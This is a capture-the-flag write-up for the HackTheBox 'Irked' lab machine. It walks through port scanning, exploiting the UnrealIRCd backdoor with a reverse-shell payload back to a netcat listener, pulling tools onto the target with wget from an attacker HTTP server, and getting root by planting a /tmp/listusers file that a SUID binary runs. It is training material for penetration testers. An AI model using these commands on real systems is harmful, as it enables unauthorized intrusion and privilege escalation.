HackTheBox | Irked

Initial TCP Nmap Scan

Nmap scan report for 10.10.10.117
Host is up (0.077s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey: 
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp  open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          36530/tcp   status
|   100024  1          45094/tcp6  status
|   100024  1          50161/udp6  status
|_  100024  1          50210/udp   status
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Full TCP Nmap Scan

Nmap scan report for 10.10.10.117
Host is up (0.076s latency).
Not shown: 65528 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey: 
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          36530/tcp   status
|   100024  1          45094/tcp6  status
|   100024  1          50161/udp6  status
|_  100024  1          50210/udp   status
6697/tcp  open  irc     UnrealIRCd
8067/tcp  open  irc     UnrealIRCd
36530/tcp open  status  1 (RPC #100024)
65534/tcp open  irc     UnrealIRCd
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Initial Thoughts Based On Nmap Scans

Based on the Nmap scans, I am going to just speak out my thoughts based on the ports I see from top to bottom. Starting with 22 - SSH, this is usually a port I will deal with once I have gotten some sort of username or credentials to log into an account. I will also quickly look to see if this is an out of date version as this may lead to SSH being vulnerable to an exploit. More likely than not it will just be a vector in which we use once we gain credentials / a username so we can brute force the account. Next, with 80 - HTTP, something to note about HTTP is that it is a beast on it’s own. I just start off small by simply looking at the site, taking a look at the page source and see if there is anything interesting in there, do directory brute forcing to see if I can discover any new directories on the website, look to see if I can identify any version numbers in which I can Google for an exploit for that particular service and version number, etc. Next, 111 - rpcbind which is a Portmapper which is just used to provide information between Unix based systems. You can usually go and probe this to fingerprint the OS and maybe obtain information about available services. This will most likely be the last port I look at as the exploit path is fairly niche in my experience so far. Next, we have a few ports (6697, 8067, 36530, 65534) for IRC which is an Internet Relay Chat. Essentially it is just a text-based chat system that can be hosted. For this, I will most likely just be Googling if there are any known exploits for this particular service “UnrealIRCd”. With my thoughts being expressed, let’s start this box!

HTTP - 80 | Enumeration

Firstly I start by just navigating to the page by going to http://10.10.10.117. There is nothing really interesting here besides a picture. I go ahead and run a gobuster scan against the web application.

gobuster dir -u http://10.10.10.117 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Doing this did not really yield anything useful. Seeing that there is no directories being found, I tried to use some extensions for the gobuster scan as well and no luck.

gobuster dir -u http://10.10.10.117 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.pdf

I went ahead and checked the page source as well and nothing was here except for the path to the image which was simply http://10.10.10.117/irked.jpg. As there was not really much to go off of at this point, I went ahead and left this on the back burner for now.

IRC - 6697/8067/36530/65534 | Enumeration

The first thing I did when seeing this was just do a simple searchsploit search which is a tool that simply archives the Exploit Database website for exploits.

searchsploit UnrealIRC
root@kali~searchsploit UnrealIRC
---------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                      |  Path
---------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit)                                                                                        | linux/remote/16922.rb
UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow                                                                                             | windows/dos/18011.txt
UnrealIRCd 3.2.8.1 - Remote Downloader/Execute                                                                                                      | linux/remote/13853.pl
UnrealIRCd 3.x - Remote Denial of Service                                                                                                           | windows/dos/27407.pl
---------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

I see one that mentions “Backdoor Command Execution”. Sounds pretty intriguing if you ask me. As I am prepping for the OSCP exam and Metasploit is limited, I go ahead and Googled for this exploit and found this. I go ahead and clone it onto my box.

git clone https://github.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor.git

Low Privilege Shell

Running the command I can see what arguments it needs for this exploit to run properly.

python3 exploit.py
root@kali-[/opt/UnrealIRCd-3.2.8.1-Backdoor]python3 exploit.py                                
usage: exploit.py [-h] -payload {python,netcat,bash} ip port
exploit.py: error: the following arguments are required: ip, port, -payload

So I need the IP address, the port number, and use -payload and specify what I want, either python, netcat, or bash. I’m going to use bash. Before I do anything else though I also need to change the local_ip and local_port variables to my own IP and a port I will be listening on. I chose 443 as the port I will be listening on.

vim exploit.py
# Sets the local ip and port (address and port to listen on)
local_ip = '10.10.14.36'  # CHANGE THIS
local_port = '443'  # CHANGE THIS 

I went ahead and saved the file. Now I can set up my Netcat listener on port 443.

nc -lvnp 443

With my Netcat listener set up, I can run the exploit:

python3 exploit.py 10.10.10.117 6697 -payload bash
root@kali-[/opt/UnrealIRCd-3.2.8.1-Backdoor]python3 exploit.py 10.10.10.117 6697 -payload bash
Exploit sent successfully!

Looking back at my Netcat listener I got a connection!

root@kali-[~]nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.36] from (UNKNOWN) [10.10.10.117] 37515
bash: cannot set terminal process group (639): Inappropriate ioctl for device
bash: no job control in this shell
ircd@irked:~/Unreal3.2$ whoami && id
whoami && id
ircd
uid=1001(ircd) gid=1001(ircd) groups=1001(ircd)

Privilege Escalation

Now that we have a low privileged shell, I am going to look for ways to escalate my privileges to root. Good thing to always run when you get a low privileged shell is to run linPEAS or winPEAS depending on what operating system you are on. For me, I am on a Unix based system so I will be running linPEAS. If you do not already have it, simply copy paste this into a file (using a text editor like vim, nano, etc.) on your host and name it linpeas.sh. After that, host a simple Python HTTP server by running this command (make sure you are running this command within the directory that has your linpeas.sh file in it:

python -m SimpleHTTPServer 80

Hosting a Python Simple HTTP server will let me grab the file from my host and get it onto the low privileged shell. To download linpeas.sh off of my host from the low privileged shell, I need to use some sort of command to download the file. Typically I would use curl which is used to transfer data from or to a server using protocols like HTTP, FTP, IMAP, you name it. This box however doesn’t have curl. Thankfully, there is another tool which is wget. Wget is a utility for non-interactive download of files from the Web. So I can use Wget to go and download the file from my host and put it onto this box. I’m going to go ahead and do that.

wget http://10.10.14.36/linpeas.sh
ircd@irked:~/Unreal3.2$ wget http://10.10.14.36/linpeas.sh
wget http://10.10.14.36/linpeas.sh
--2021-06-07 19:09:37--  http://10.10.14.36/linpeas.sh
Connecting to 10.10.14.36:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 341863 (334K) [text/x-sh]
Saving to: ‘linpeas.sh’

     0K .......... .......... .......... .......... .......... 14%  324K 1s
    50K .......... .......... .......... .......... .......... 29%  654K 1s
   100K .......... .......... .......... .......... .......... 44% 4.35M 0s
   150K .......... .......... .......... .......... .......... 59%  758K 0s
   200K .......... .......... .......... .......... .......... 74% 3.90M 0s
   250K .......... .......... .......... .......... .......... 89% 2.66M 0s
   300K .......... .......... .......... ...                  100% 2.18M=0.4s

2021-06-07 19:09:37 (943 KB/s) - ‘linpeas.sh’ saved [341863/341863]

Now that it is saved onto the box with the low privileged shell, I have to make sure the file is executable by running chmod +x.

chmod +x linpeas.sh

Now run it.

./linpeas.sh

This will give a lot of output. Something that seemed interesting to me under the “Interesting Files” section was this “Unknown SUID binary” under the path /usr/bin/viewuser. SUID is short for Set User ID which is a type of permission that allows users to execute a file wit the permissions of a specified user, this being the root user. So as the user we are right now (ircd), we can run this file.

════════════════════════════════════╣ Interesting Files ╠════════════════════════════════════
[+] SUID - Check easy privesc, exploits and write perms
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
strace Not Found                                                                           
-rwsr-sr-x 1 root   root       9.3K Apr  1  2014 /usr/bin/X
-rwsr-xr-x 1 root   root        95K Aug 13  2014 /sbin/mount.nfs
-rwsr-sr-x 1 daemon daemon      50K Sep 30  2014 /usr/bin/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-xr-x 1 root   root        14K Oct 14  2014 /usr/lib/spice-gtk/spice-client-glib-usb-acl-helper (Unknown SUID binary)
-rwsr-xr-x 1 root   root        26K Mar 29  2015 /bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x 1 root   root        34K Mar 29  2015 /bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-- 1 root   dip        332K Apr 14  2015 /usr/sbin/pppd  --->  Apple_Mac_OSX_10.4.8(05-2007)
-rwsr-xr-x 1 root   root        34K Jan 21  2016 /bin/fusermount
-rwsr-xr-x 1 root   root        14K Sep  8  2016 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root   root        18K Sep  8  2016 /usr/bin/pkexec  --->  Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
-rwsr-xr-- 1 root   messagebus 355K Nov 21  2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root   root       158K Jan 28  2017 /bin/ntfs-3g  --->  Debian9/8/7/Ubuntu/Gentoo/others/Ubuntu_Server_16.10_and_others(02-2017)
-rwsr-xr-x 1 root   root       9.3K Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root   root        52K May 17  2017 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root   root        77K May 17  2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root   root        43K May 17  2017 /usr/bin/chsh
-rwsr-xr-x 1 root   root        52K May 17  2017 /usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root   root        38K May 17  2017 /usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root   root        38K May 17  2017 /bin/su
-rwsr-sr-x 1 root   mail        94K Nov 18  2017 /usr/bin/procmail                
-rwsr-xr-x 1 root   root       550K Nov 19  2017 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root   root       1.1M Feb 10  2018 /usr/sbin/exim4
-rwsr-xr-x 1 root   root       7.2K May 16  2018 /usr/bin/viewuser (Unknown SUID binary)

I go ahead and test out what it does by just running it

djmardov@irked:/tmp$ /usr/bin/viewuser       
This application is being devleoped to set and test user permissions
It is still being actively developed                                                                                                                                                  
(unknown) :0           2021-06-07 09:01 (:0)                                                                                                                                          
djmardov pts/0        2021-06-07 15:38 (10.10.14.36)                                                                                                                                  
sh: 1: /tmp/listusers: not found

And it’s mentioning on the bottom something about /tmp/listusers was not found. Interesting. So it can’t find the file under the /tmp directory and it is trying to run it. Something to remember is that this is running as the root user so anything it will run will be ran as root. So technically, all we need to do is create a listusers file, put it into the /tmp directory, and have some sort of content within the listusers file that will spawn a shell. This is really simple so let’s do it. Firstly, I go ahead and use cd to change directories into /tmp

cd /tmp

Now I go back onto my host and create a file named listusers using a text editor like vim, nano, etc. Doesn’t really matter as long as you can write into the file. I go ahead and put the following into the file:

#!/bin/bash

bash

The #!/bin/bash is known as a “shebang”. This is used to essentially instruct this program to run from /bin/bash. Then all I put in there after is just bash. Typing bash into a terminal will just spawn a bash shell. So all this is doing is specifying we need to run from /bin/bash and then use the command bash to spawn a bash shell. Easy enough. Now I went ahead and saved the file and I start up another Python HTTP server. Again, I am using this so I can transfer the file from my host to the low privileged shell.

python -m SimpleHTTPServer 80

Now on the low privileged shell, I download the file from my host

wget http://10.10.14.36/listusers
ircd@irked:/tmp$ wget http://10.10.14.36/listusers
wget http://10.10.14.36/listusers
--2021-06-07 19:19:20--  http://10.10.14.36/listusers
Connecting to 10.10.14.36:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 18 [application/octet-stream]
Saving to: ‘listusers’

     0K                                                       100% 3.86M=0s

2021-06-07 19:19:20 (3.86 MB/s) - ‘listusers’ saved [18/18]

Now that the file is in here, I am going to go ahead and run the SUID binary again.

/usr/bin/viewuser
ircd@irked:/tmp$ /usr/bin/viewuser
/usr/bin/viewuser
(unknown) :0           2021-07-07 09:01 (:0)
djmardov pts/0        2021-07-07 15:38 (10.10.14.36)
whoami && id
root
uid=0(root) gid=1001(ircd) groups=1001(ircd)

And I am now the root user!